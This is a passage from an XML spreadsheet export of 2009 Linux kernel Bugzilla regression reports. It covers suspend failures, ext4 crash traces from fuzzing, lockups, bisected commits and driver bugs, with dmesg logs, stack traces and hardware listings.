    <t>Hardware: Athlon 64 3000 in 64 bits mode (Acer Aspire 1511Lmi laptop) Distro: Bluewhite64 Since 2.6.32-rc1, with main debug options, I get the following message in dmesg log each time a ping request is issued: ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready CPUFREQ: Per core ondemand sysfs interface is deprecated - up_threshold NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 etc. The command issue is: ping www.google.fr and the message stops as soon as I kill ping. The problem may come from the network driver. For information, the connection is established by WPA Wifi with the b43 driver: b43 ssb0:0: firmware: requesting b43/ucode5.fw b43 ssb0:0: firmware: requesting b43/pcm5.fw b43 ssb0:0: firmware: requesting b43/b0g0initvals5.fw b43 ssb0:0: firmware: requesting b43/b0g0bsinitvals5.fw b43-phy0: Loading firmware version 410.2160 (2007-05-26 15:32:10)</t>
  </si>
  <si>
    <t>Suspend to RAM freeze totally since 2.6.32-rc1 - Acer Aspire 1511Lmi laptop</t>
  </si>
  <si>
    <t>2009-09-30 18:14 UTC</t>
  </si>
  <si>
    <t>2009-10-26 18:27 UTC</t>
  </si>
  <si>
    <t>Created attachment 23209 [details] dmesg log for the failing platform Hardware: Athlon 64 3000 in 64 bits mode (Acer Aspire 1511Lmi laptop) Distro: Bluewhite64 Do not have more information, the laptop freeze totally (black screen, nothing responds, must use the power button for more than 5s to stop it). Dmesg output before suspend appended</t>
  </si>
  <si>
    <t>ext4: fixpoint divide exception at ext4_fill_super</t>
  </si>
  <si>
    <t>2.6.32-rc1, 2.6.31</t>
  </si>
  <si>
    <t>2009-10-01 05:58 UTC</t>
  </si>
  <si>
    <t>R.Nageswara Sastry</t>
  </si>
  <si>
    <t>2012-06-13 18:55 UTC</t>
  </si>
  <si>
    <t>Found kernel bug - fixpoint divide exception While working with fsfuzzer Environment: 2.6.31 and 2.6.32-rc1 Architecture: s390 and ppc64 ------------[ cut here ]------------ Kernel BUG at 000003e00429d934 [verbose debug info unavailable] fixpoint divide exception: 0009 [#1] SMP Modules linked in: ext4 jbd2 crc16 loop autofs4 lockd sunrpc ipv6 qeth_l2 qeth q dio vmur ccwgroup dm_round_robin dm_multipath scsi_dh sd_mod scsi_mod multipath dm_snapshot dm_zero dm_mirror dm_region_hash dm_log dm_mod dasd_fba_mod dasd_eck d_mod dasd_mod ext3 jbd CPU: 2 Not tainted 2.6.31-rc6 #1 Process mount (pid: 2675, task: 000000003ed06038, ksp: 0000000036217920) Krnl PSW : 0704200180000000 000003e00429d934 (ext4_fill_super+0x1478/0x2908 [ext 4]) R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:2 PM:0 EA:3 Krnl GPRS: 0000000000000100 0000000000000100 0000000000000006 000000002fc61800 0000000000000000 0000000000000100 000000002fc61800 000000002fc61800 000000003143a800 00000000000000e0 0000000000000000 000000003eb0d800 000003e00427c000 000003e0042b8958 000003e00429d87c 0000000036217b10 Krnl Code: 000003e00429d928: b9160050 llgfr %r5,%r0 000003e00429d92c: a7490000 lghi %r4,0 000003e00429d930: b987004a dlgr %r4,%r10 &gt;000003e00429d934: b91600a5 llgfr %r10,%r5 000003e00429d938: a53f80d0 llill %r3,32976 000003e00429d93c: a7ad000c mghi %r10,12 000003e00429d940: b904002a lgr %r2,%r10 000003e00429d944: 1895 lr %r9,%r5 Call Trace: ([&lt;000003e00429d87c&gt;] ext4_fill_super+0x13c0/0x2908 [ext4]) [&lt;00000000000f46f2&gt;] get_sb_bdev+0x13e/0x19c [&lt;000003e00429230e&gt;] ext4_get_sb+0x2e/0x40 [ext4] [&lt;00000000000f3f98&gt;] vfs_kern_mount+0xc0/0x168 [&lt;00000000000f40ac&gt;] do_kern_mount+0x58/0x114 [&lt;000000000010e558&gt;] do_mount+0x798/0x830 [&lt;000000000010e6a0&gt;] SyS_mount+0xb0/0x100 [&lt;00000000000266be&gt;] sysc_noemu+0x10/0x16 [&lt;0000004e53f234e2&gt;] 0x4e53f234e2 Last Breaking-Event-Address: [&lt;000003e00429d8d8&gt;] ext4_fill_super+0x141c/0x2908 [ext4] ---[ end trace b5563edf9c0c9b52 ]--- 2.6.32-rc1 stack trace ------------[ cut here ]------------ Kernel BUG at 000003e0024d6b52 [verbose debug info unavailable] fixpoint divide exception: 0009 [#1] SMP Modules linked in: ext4 jbd2 crc16 autofs4 lockd sunrpc ipv6 loop qeth_l2 qeth vmur qdio ccwgroup dm_round_robin dm_multipath scsi_dh sd_mod scsi_mod multipath dm_snapshot dm_zero dm_mirror dm_region_hash dm_log dm_mod dasd_fba_mod dasd_eckd_mod dasd_mod ext3 jbd CPU: 2 Not tainted 2.6.32-rc2 #1 Process mount (pid: 2752, task: 00000000233e47c0, ksp: 00000000233a3910) Krnl PSW : 0704200180000000 000003e0024d6b52 (ext4_fill_super+0x1506/0x29c0 [ext4]) R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:2 PM:0 EA:3 Krnl GPRS: 0000000e00000100 0000000000000100 0000000000000006 00000000200ad000 0000000000000000 0000000000000100 00000000200ad000 00000000200ad000 00000000200ae000 000000001ab6d800 0000000000000000 00000000000000e0 000003e0024b3000 000003e0024f2d28 000003e0024d6ab8 00000000233a3b00 Krnl Code: 000003e0024d6b46: b9160050 llgfr %r5,%r0 000003e0024d6b4a: a7490000 lghi %r4,0 000003e0024d6b4e: b987004a dlgr %r4,%r10 &gt;000003e0024d6b52: b91600b5 llgfr %r11,%r5 000003e0024d6b56: a53f80d0 llill %r3,32976 000003e0024d6b5a: a7bd000c mghi %r11,12 000003e0024d6b5e: b904002b lgr %r2,%r11 000003e0024d6b62: 18a5 lr %r10,%r5 Call Trace: ([&lt;000003e0024d6ab8&gt;] ext4_fill_super+0x146c/0x29c0 [ext4]) [&lt;0000000000111ed8&gt;] get_sb_bdev+0x158/0x1b4 [&lt;000003e0024cbe16&gt;] ext4_get_sb+0x2e/0x40 [ext4] [&lt;00000000001119ac&gt;] vfs_kern_mount+0xc0/0x19c [&lt;0000000000111af4&gt;] do_kern_mount+0x58/0x114 [&lt;000000000012d760&gt;] do_mount+0x7b4/0x84c [&lt;000000000012d89c&gt;] SyS_mount+0xa4/0xec [&lt;0000000000027f5a&gt;] sysc_tracego+0xe/0x14 [&lt;0000004e53f234e2&gt;] 0x4e53f234e2 Last Breaking-Event-Address: [&lt;000003e0024d6afa&gt;] ext4_fill_super+0x14ae/0x29c0 [ext4] ---[ end trace b8c3330dd3812f17 ]---</t>
  </si>
  <si>
    <t>Random Lockup with automount, mysqld,  and kswapd0 error messages.</t>
  </si>
  <si>
    <t>2009-10-01 15:02 UTC</t>
  </si>
  <si>
    <t>Paul Logasa Bogen II</t>
  </si>
  <si>
    <t>2012-06-13 18:56 UTC</t>
  </si>
  <si>
    <t>Created attachment 23221 [details] Bug Report Logs (kern.log, lsmod, lspci, debconf) After a semi-random period of normal operation (anywhere from a few hours to a week) the machine will suddenly get a series of page allocation errors followed by a series of "soft lockup - CPU#[X] stuck" messages after which the machine is completely non responsive and has to be hard restarted. I've seen this occur on two other systems in addition to this one. I have already filed this with the Debian project (http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=548397) and they suggested I file it upstream. Thanks, Paul Logasa Bogen II Senior Systems Adminstrator / Doctoral Candidate Center for the Study of Digital Libraries Department of Computer Science and Engineering Texas A&amp;M University</t>
  </si>
  <si>
    <t>spitz boots but suspend/resume is broken</t>
  </si>
  <si>
    <t>2009-10-01 22:01 UTC</t>
  </si>
  <si>
    <t>2009-11-18 22:20 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.32-rc1: spitz boots but suspend/resume is broken Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2009-09-30 12:06 References : http://marc.info/?l=linux-kernel&amp;m=125431244516449&amp;w=4 Notify-Also : "Dmitry Eremin-Solenikov" &lt;dbaryshkov@gmail.com&gt; Notify-Also : Eric Miao &lt;eric.y.miao@gmail.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>warning at manage.c:361 (set_irq_wake), matrix-keypad related?</t>
  </si>
  <si>
    <t>2009-10-01 22:08 UTC</t>
  </si>
  <si>
    <t>2011-01-16 12:56 UTC</t>
  </si>
  <si>
    <t>Subject : 32-rc1 aka 32-rc2: warning at manage.c:361 (set_irq_wake), matrix-keypad related? Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2009-09-30 20:07 References : http://marc.info/?l=linux-kernel&amp;m=125434130703538&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG_ON crash w/ ext4</t>
  </si>
  <si>
    <t>2009-10-01 22:19 UTC</t>
  </si>
  <si>
    <t>2009-10-03 22:57 UTC</t>
  </si>
  <si>
    <t>Subject : [Kernel BUG] ext4 for v2.6.32 round II Submitter : Markus Trippelsdorf &lt;markus@trippelsdorf.de&gt; Date : 2009-10-01 1:41 References : http://marc.info/?l=linux-kernel&amp;m=125436130800340&amp;w=4 Handled-By : Theodore Tso &lt;tytso@mit.edu&gt; Patch : http://patchwork.kernel.org/patch/50810/ This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: at net/ipv4/af_inet.c:154</t>
  </si>
  <si>
    <t>2009-10-01 22:25 UTC</t>
  </si>
  <si>
    <t>2009-10-26 19:26 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31: WARNING: at net/ipv4/af_inet.c:154 inet_sock_destruct+0x164/0x1c0() Submitter : Ralf Hildebrandt &lt;Ralf.Hildebrandt@charite.de&gt; Date : 2009-09-30 12:24 References : http://marc.info/?l=linux-kernel&amp;m=125431350218137&amp;w=4 Notify-Also : Eric Dumazet &lt;eric.dumazet@gmail.com&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel panic on i386 machine when booting with profile=2</t>
  </si>
  <si>
    <t>2009-10-01 22:28 UTC</t>
  </si>
  <si>
    <t>2009-10-27 08:13 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] Fix kernel panic on i386 machine when booting with profile=2 Submitter : "Shi, Alex" &lt;alex.shi@intel.com&gt; Date : 2009-10-01 3:23 References : http://marc.info/?l=linux-kernel&amp;m=125436749607199&amp;w=4 Handled-By : Alex Shi &lt;alex.shi@intel.com&gt; Patch : http://patchwork.kernel.org/patch/50813/ Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[bisected] 2.6.31 regression sis5513 PIO Mode 0 hang</t>
  </si>
  <si>
    <t>2009-10-03 02:52 UTC</t>
  </si>
  <si>
    <t>David Fries</t>
  </si>
  <si>
    <t>2009-11-06 13:05 UTC</t>
  </si>
  <si>
    <t>I just did a git bisection from 2.6.30 to 2.6.31 because 2.6.31 will not boot on this system. d.stussy@yahoo.com's post September 12th looks the same, different CPU but both have sis5513 IDE chips. His would normally init the ethernet chip next, mine would do PS/2 next, both hang right after the Uniform CD-ROM message. This was bisected down to chaging PIO mode 0 for probing. What problem was that patch trying to solve? Reverting just that patch at the top of 2.6.31 tree works. I can test patches. Uniform Multi-Platform E-IDE driver sis5513 0000:00:02.5: SiS635 ATA 100 (2nd gen) controller sis5513 0000:00:02.5: IDE controller (0x1039:0x5513 rev 0xd0) sis5513 0000:00:02.5: not 100% native mode: will probe irqs later ide0: BM-DMA at 0xff00-0xff07 ide1: BM-DMA at 0xff08-0xff0f Probing IDE interface ide0... Switched to high resolution mode on CPU 0 hda: ST3250823A, ATA DISK drive hda: host max PIO4 wanted PIO255(auto-tune) selected PIO4 hda: UDMA/100 mode selected Probing IDE interface ide1... hdc: _NEC DVD_RW ND-2500A, ATAPI CD/DVD-ROM drive hdc: host max PIO4 wanted PIO255(auto-tune) selected PIO4 hdc: UDMA/33 mode selected ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 ide1 at 0x170-0x177,0x376 on irq 15 ide_generic: please use "probe_mask=0x3f" module parameter for probing all legacy ISA IDE ports ide-gd driver 1.18 hda: max request size: 512KiB hda: 488397168 sectors (250059 MB) w/8192KiB Cache, CHS=30401/255/63 hda: cache flushes supported hda: hda1 hda2 hda3 ide-cd driver 5.00 ide-cd: hdc: ATAPI 40X DVD-ROM DVD-R CD-R/RW drive, 2048kB Cache Uniform CD-ROM driver Revision: 3.20 &lt;hang&gt; commit 6029336426a2b43e4bc6f4a84be8789a047d139e Author: Joao Ramos &lt;joao.ramos@inov.pt&gt; Date: Sun May 17 17:22:54 2009 +0200 ide: try to use PIO Mode 0 during probe if possible Initially set PIO Mode 0 for all host drivers that have a 'set_pio_mode' method before the IDE core figures out the most suited PIO mode for the attached device. Signed-off-by: Joao Ramos &lt;joao.ramos@inov.pt&gt; Cc: Sergei Shtylyov &lt;sshtylyov@ru.montavista.com&gt; Signed-off-by: Bartlomiej Zolnierkiewicz &lt;bzolnier@gmail.com&gt; diff --git a/drivers/ide/ide-probe.c b/drivers/ide/ide-probe.c index 7f264ed..b609a58 100644 --- a/drivers/ide/ide-probe.c +++ b/drivers/ide/ide-probe.c @@ -1032,6 +1032,15 @@ static void ide_port_init_devices(ide_hwif_t *hwif) if (port_ops &amp;&amp; port_ops-&gt;init_dev) port_ops-&gt;init_dev(drive); } + + ide_port_for_each_dev(i, drive, hwif) { + /* + * default to PIO Mode 0 before we figure out + * the most suited mode for the attached device + */ + if (port_ops &amp;&amp; port_ops-&gt;set_pio_mode) + port_ops-&gt;set_pio_mode(drive, 0); + } } static void ide_init_port(ide_hwif_t *hwif, unsigned int port, vendor_id : CentaurHauls cpu family : 6 model : 7 model name : VIA Samuel 2 lspci 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 635 Host (rev 11) 00:01.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) 00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS85C503/5513 (LPC Bridge) 00:02.1 SMBus: Silicon Integrated Systems [SiS] SiS961/2 SMBus Controller 00:02.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.1 Controller (rev 07) 00:02.3 USB Controller: Silicon Integrated Systems [SiS] USB 1.1 Controller (rev 07) 00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) 00:02.6 Modem: Silicon Integrated Systems [SiS] AC'97 Modem Controller (rev a0) 00:02.7 Multimedia audio controller: Silicon Integrated Systems [SiS] AC'97 Sound Controller (rev a0) 00:03.0 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet (rev 90) 00:09.0 Multimedia video controller: Conexant CX23880/1/2/3 PCI Video and Audio Decoder (rev 05) 00:09.2 Multimedia controller: Conexant CX23880/1/2/3 PCI Video and Audio Decoder [MPEG Port] (rev 05) 01:00.0 VGA compatible controller: Silicon Integrated Systems [SiS] 315PRO PCI/AGP VGA Display Adapter</t>
  </si>
  <si>
    <t>drm/i915: temporal screen corruption with framebuffer compression</t>
  </si>
  <si>
    <t>v2.6.32-rc1</t>
  </si>
  <si>
    <t>2009-10-03 09:25 UTC</t>
  </si>
  <si>
    <t>2009-11-04 18:55 UTC</t>
  </si>
  <si>
    <t>Hi *, I've tested v2.6.32-rc1 and found that the screen is corrupt in X, some lines go left while other move more to the left and others don't move and this corruption changes when the screen image is updated. Of course with KMS. In v2.6.32-rc1 it happens after a sleep/resume cycle, but in other versions it happens just after boot. I've bisected this and found this commit as guilty: v2.6.31-rc9-145-g74dff28 commit 74dff282237ea8c0a5df1afd8526eac4b6cee063 Author: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Date: Tue Sep 15 00:39:40 2009 drm/i915: framebuffer compression for GM45+ Add support for framebuffer compression on GM45 and above. Removes some unnecessary I915_HAS_FBC checks as well (this is now part of the FBC display function). Signed-off-by: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Signed-off-by: Eric Anholt &lt;eric@anholt.net&gt; I have a Dell Latitude E5400 with the graphic card: 00:02.0 VGA compatible controller [0300]: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller [8086:2a42] (rev 07) 00:02.1 Display controller [0380]: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller [8086:2a43] (rev 07) I've also reverted this commit on top of v2.6.32-rc1 and it also fixes the problem. If you need more info or you want me to test patches just tell me. Thanks, Santi</t>
  </si>
  <si>
    <t>Commit a9327cac440be4d8333bba975cbbf76045096275 causes iostat output</t>
  </si>
  <si>
    <t>2009-10-04 21:46 UTC</t>
  </si>
  <si>
    <t>2009-10-05 19:23 UTC</t>
  </si>
  <si>
    <t>Subject : [bisected] commit: a9327cac440be4d8333bba975cbbf76045096275 causes iostat output Submitter : Corrado Zoccolo &lt;czoccolo@gmail.com&gt; Date : 2009-10-04 12:49 References : http://lkml.org/lkml/2009/10/4/19 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Caused by: commit a9327cac440be4d8333bba975cbbf76045096275 Author: Nikanth Karthikesan &lt;knikanth@suse.de&gt; Date: Fri Sep 11 09:18:54 2009 +0200 Seperate read and write statistics of in_flight requests Signed-off-by: Nikanth Karthikesan &lt;knikanth@suse.de&gt; Signed-off-by: Jens Axboe &lt;jens.axboe@oracle.com&gt; First-Bad-Commit : a9327cac440be4d8333bba975cbbf76045096275</t>
  </si>
  <si>
    <t>Sata disk doesn't wake up after S3 suspend</t>
  </si>
  <si>
    <t>2.6.31 --&gt; 2.6.32-rc3</t>
  </si>
  <si>
    <t>2009-10-05 22:58 UTC</t>
  </si>
  <si>
    <t>frodone</t>
  </si>
  <si>
    <t>2009-11-17 08:55 UTC</t>
  </si>
  <si>
    <t>Created attachment 23274 [details] messages After suspend one of my secondary disks doesn't resume. It works ok under kernel 2.6.30.9 and previous. I have 4 disk connected to the same Nvidia sata controller: 3 identical maxtor (sda/b/c) and 1 Hitachi (sdd), and this last one doesn't wakes up. In attachment the interesting lines from /var/log/messages and the output of hdparm -I. Thank you.</t>
  </si>
  <si>
    <t>pcmcia suspend regression from 2.6.31.1 to 2.6.31.2 - Dell Inspiron 600m</t>
  </si>
  <si>
    <t>2.6.31.2</t>
  </si>
  <si>
    <t>2009-10-06 15:44 UTC</t>
  </si>
  <si>
    <t>2009-11-11 04:54 UTC</t>
  </si>
  <si>
    <t>I upgraded to 2.6.31.2 from 2.6.31.1 and my laptop would not wake up from suspend anymore. Laptop is a Dell Inspiron 600m. Located a commit that talked about suspend/resume and did a bisect around it. Here's the result of the bisect: 53024df259e37ad49ee3d1f3721d4cecdd7bc357 is the first bad commit commit 53024df259e37ad49ee3d1f3721d4cecdd7bc357 Author: Rafael J. Wysocki &lt;rjw@sisk.pl&gt; Date: Tue Sep 29 00:11:03 2009 +0200 PM / yenta: Fix cardbus suspend/resume regression commit 0c570cdeb8fdfcb354a3e9cd81bfc6a09c19de0c upstream. Since 2.6.29 the PCI PM core have been restoring the standard configuration registers of PCI devices in the early phase of resume. In particular, PCI devices without drivers have been handled this way since commit 355a72d75b3b4f4877db4c9070c798238028ecb5 (PCI: Rework default handling of suspend and resume). Unfortunately, this leads to post-resume problems with CardBus devices which cannot be accessed in the early phase of resume, because the sockets they are on have not been woken up yet at that point. To solve this problem, move the yenta socket resume to the early phase of resume and, analogously, move the suspend of it to the late phase of suspend. Additionally, remove some unnecessary PCI code from the yenta socket's resume routine. Fixes http://bugzilla.kernel.org/show_bug.cgi?id=13092, which is a post-2.6.28 regression. Signed-off-by: Rafael J. Wysocki &lt;rjw@sisk.pl&gt; Reported-by: Florian &lt;fs-kernelbugzilla@spline.de&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; :040000 040000 55b935c46d3cea356087b7070ba4072c18fa0215 16829a0439b5632f9027d1d66a2f3a32a66f0870 M drivers Modules related to pcmcia and yenta: $ lsmod | grep -E "pcmcia|yenta" pcmcia 31816 0 yenta_socket 23632 4 rsrc_nonstatic 10532 1 yenta_socket pcmcia_core 31444 3 pcmcia,yenta_socket,rsrc_nonstatic I confirm that if I unload these modules suspend/resume works fine. Find attached the output of 'lspci -v'</t>
  </si>
  <si>
    <t>[Pardus] Soft Lockup Problem with Attansic Ethernet Card</t>
  </si>
  <si>
    <t>2009-10-06 22:37 UTC</t>
  </si>
  <si>
    <t>Erdem Artan</t>
  </si>
  <si>
    <t>2012-06-13 19:32 UTC</t>
  </si>
  <si>
    <t>I have soft lockup problem with attansic ethernet card while activating eth0 interface. My ethernet card is 09:00.0 Ethernet controller: Attansic Technology Corp. Device 1063 (rev c0) If I try to activate eth0 interface while network cable is pluged in, then everything freezes. If I try to activate eth0 interface while network cable isn't pluged in, then no problem. But, if i plug in, again freezes. My /var/log/syslog is in attachment. Anything else? Regards..</t>
  </si>
  <si>
    <t>PCI host bridge driver accepts invalid apertures</t>
  </si>
  <si>
    <t>2.6.32-rc3</t>
  </si>
  <si>
    <t>2009-10-06 22:42 UTC</t>
  </si>
  <si>
    <t>2010-05-20 02:57 UTC</t>
  </si>
  <si>
    <t>On x86, we currently ignore PCI host bridge _CRS by default, but booting with "pci=use_crs" on an HP DL360 G3, BIOS version P31 10/31/2003, ACPI reports these windows in a PCI host bridge _CRS: pci_root PNP0A03:00: host bridge window: [io 0x0000-0x0cff] pci_root PNP0A03:00: host bridge window: [io 0x0000-0x2cfe] pci_root PNP0A03:00: host bridge window: [io 0x03b0-0x03bb] pci_root PNP0A03:00: host bridge window: [io 0x03c0-0x03df] pci_root PNP0A03:00: host bridge window: [mem 0xf5d00000-0xf6ffffff] pci_root PNP0A03:00: host bridge window: [mem 0x000a0000-0x000bffff] The bridge has this device behind it: pci 0000:00:05.2: reg 10: [io 0x2c00-0x2cff] This device BAR (0x2c00-0x2cff) doesn't fit in the bridge aperture (0x0-0x2cfe). This leads to the following allocation failure and causes PNP to mistakenly detect a conflict between a motherboard device and the BAR: pci 0000:00:05.2: BAR 0: no parent found for device [io 0x2c00-0x2cff] pci 0000:00:05.2: BAR 0: can't allocate [io 0x2c00-0x2cff] pnp 00:01: resource [io 0x0092] overlaps 0000:00:05.2 BAR 0 [io 0x0000-0x00ff], disabling pnp 00:01: resource [io 0x0010-0x001f] overlaps 0000:00:05.2 BAR 0 [io 0x0000-0x00ff], disabling I think the host bridge aperture size reported by _CRS (0x2cff) is invalid. The low two bits of PCI I/O BARs are not part of the base address, so I/O decoders must be aligned on four-byte boundaries, and they must be a multiple of four bytes in size. I installed Windows Server 2003 SP1 on this system. The attached Device Manager screenshot shows that Windows rounded the size up to a multiple of four. This is pretty clearly a BIOS bug, but it would be straightforward to work around it in Linux.</t>
  </si>
  <si>
    <t>dave.mueller</t>
  </si>
  <si>
    <t>Hard system lockup during association with WEP/WPA2 networks using ath5k</t>
  </si>
  <si>
    <t>2.6.28.6 2.6.30.8 2.6.32-rc2-wl-39303-g8e025fe</t>
  </si>
  <si>
    <t>2009-10-07 16:19 UTC</t>
  </si>
  <si>
    <t>2010-08-24 12:56 UTC</t>
  </si>
  <si>
    <t>Latest working kernel: Unknown Failing kernels: 2.6.28.6, 2.6.30.8, wireless-testing 2.6.32-rc2-wl-39303-g8e025fe Distribution: Gentoo Wireless Hardware: AR5005G 802.11abg NIC (rev 01) Wireless Software: net-wireless/wireless-tools-29 net-wireless/wpa_supplicant-0.5.7 The ath5k driver occasionally causes hard system lockup during association with WEP/WPA2 networks. The keyboard becomes unresponsive (caps lock/num lock do nothing), SysRq command do not work and acpid does not recognize the power button being pressed. Attaching a serial console is of no help even when using EARLY_PRINTK or nmi_watchdog. There are a number of ways to reproduce this, but it does typically take some number of hours for the lockup to occur. 1.) Cycle wpa_cli {disconnect,reassociate} 2.) Cycle ifconfig {up,down} 3.) Enter a nonexistent ssid, let wpa_supplicant run. 4.) Enter an invalid key, let wpa_supplicant run. I should also mention that I cannot reproduce this on older hardware. The current system is an Intel Q9400 (2.66GHz quad core) with 8 GB of RAM, whereas the older system used two AMD Opteron 265 HE (1.8GHz) with 4 GB of RAM. I've been testing on the older system for over a week without a single issue. Across seven of the newer machines, dedicated to reproducing this condition with various kernel configurations, I typically get at least three hanging when left to run overnight. I'll be happy to help in testing anything. Thanks in advance.</t>
  </si>
  <si>
    <t>AML Sleep() in EC _REG causes boot delay</t>
  </si>
  <si>
    <t>2009-10-08 22:18 UTC</t>
  </si>
  <si>
    <t>2011-03-21 07:41 UTC</t>
  </si>
  <si>
    <t>This is a windows compatibility issue more than it is an issue with Linux/ACPI not implementing the ACPI specification, but so be it. Some vendors (Fujitsu) are shipping machines that have an enormous Sleep() in the EC _REG method. The one in this bug report has one for 10 seconds, plus another for 8 seconds: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/100110 This sleep delays Linux boot. Curiously, Windows, and reportedly a 2.6.16 version of Linux do not experience a boot delay due to to this. Perhaps they are not actually implementing the requested delay, or perhaps the EC's _REG method is executed in parallel and the reset of boot completes, with the EC _REG completing 18 seconds later... The current proposal in the bug report above is to DMI the failing systems, and cut their long Sleep()s down to shorter ones. That is problematic, of course, for maintaining DMI is never-ending, and we can never be sure that it is correct to shorten the Sleep(). So I think we should look into why EC _REG is serialized, and see if we can un-serialize it.</t>
  </si>
  <si>
    <t>WARNING: at net/mac80211/scan.c:267</t>
  </si>
  <si>
    <t>2009-10-08 22:32 UTC</t>
  </si>
  <si>
    <t>2009-11-17 22:18 UTC</t>
  </si>
  <si>
    <t>Subject : wlan0: deauthenticated from 00:1b:11:f6:0f:28 (Reason: 6) Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2009-10-08 00:30 References : http://bugzilla.intellinuxwireless.org/show_bug.cgi?id=2089#c7 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: sleeping function called from invalid context at kernel/mutex.c:280</t>
  </si>
  <si>
    <t>2009-10-08 22:37 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.32-rc3 -- BUG: sleeping function called from invalid context at kernel/mutex.c:280 -- 2 locks held by head Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2009-10-05 3:39 References : http://marc.info/?l=linux-kernel&amp;m=125471432208671&amp;w=4 Notify-Also : Johannes Berg &lt;johannes@sipsolutions.net&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Bad corruption with 2.6.32-rc1 and upwards</t>
  </si>
  <si>
    <t>2009-10-09 15:42 UTC</t>
  </si>
  <si>
    <t>Holger Freyther</t>
  </si>
  <si>
    <t>2009-11-17 22:22 UTC</t>
  </si>
  <si>
    <t>14370 14422</t>
  </si>
  <si>
    <t>I don't know how to reproduce but I'm seeing the following issues with 2.6.32-rcX since the "BUG_ON with page buffers has been fixed" on a daily basis. - Clean shutdown - Reboot -&gt; fs turns into ro mode - Reboot -&gt; fsck. I see blocks assigned to two inodes and many lost+found of files touched close before the shutdown or during the shutdown. This requires to go through the 1B, 1C, 1D pass on fsck. I'm not sure how to reproduce and how to properly report it to be of use for anyone. I'm seeing ext4 corruption on a daily basis though.</t>
  </si>
  <si>
    <t>USB serial regression after 2.6.31.1 with Huawei E169 GSM modem</t>
  </si>
  <si>
    <t>2.6.31.2, 2.6.32-rc3</t>
  </si>
  <si>
    <t>2009-10-10 03:07 UTC</t>
  </si>
  <si>
    <t>2009-11-17 22:23 UTC</t>
  </si>
  <si>
    <t>Created attachment 23323 [details] 2.6.31.1 (+ ubuntu patches) working log See http://marc.info/?l=linux-kernel&amp;m=125513456327542&amp;w=2 And associated thread. I'll attach usbmon logs here</t>
  </si>
  <si>
    <t>found a possible resource leak in file linux-2.6.31/arch/um/drivers/xterm.c</t>
  </si>
  <si>
    <t>2009-10-10 11:27 UTC</t>
  </si>
  <si>
    <t>2012-06-13 19:51 UTC</t>
  </si>
  <si>
    <t>Created attachment 23332 [details] should fix the issue Hello, during the check with the static code analysis tool cppcheck (available on sourceforge:: https://sourceforge.net/projects/cppcheck/), i found a possible resource leak in file linux-2.6.31/arch/um/drivers/xterm.c. See the attached patch, the fixes this issue. Best regards Martin</t>
  </si>
  <si>
    <t>ath9k crashes after resume</t>
  </si>
  <si>
    <t>2.6.31-tuxonice</t>
  </si>
  <si>
    <t>2009-10-10 12:59 UTC</t>
  </si>
  <si>
    <t>Zsolt Barat</t>
  </si>
  <si>
    <t>2009-11-19 20:23 UTC</t>
  </si>
  <si>
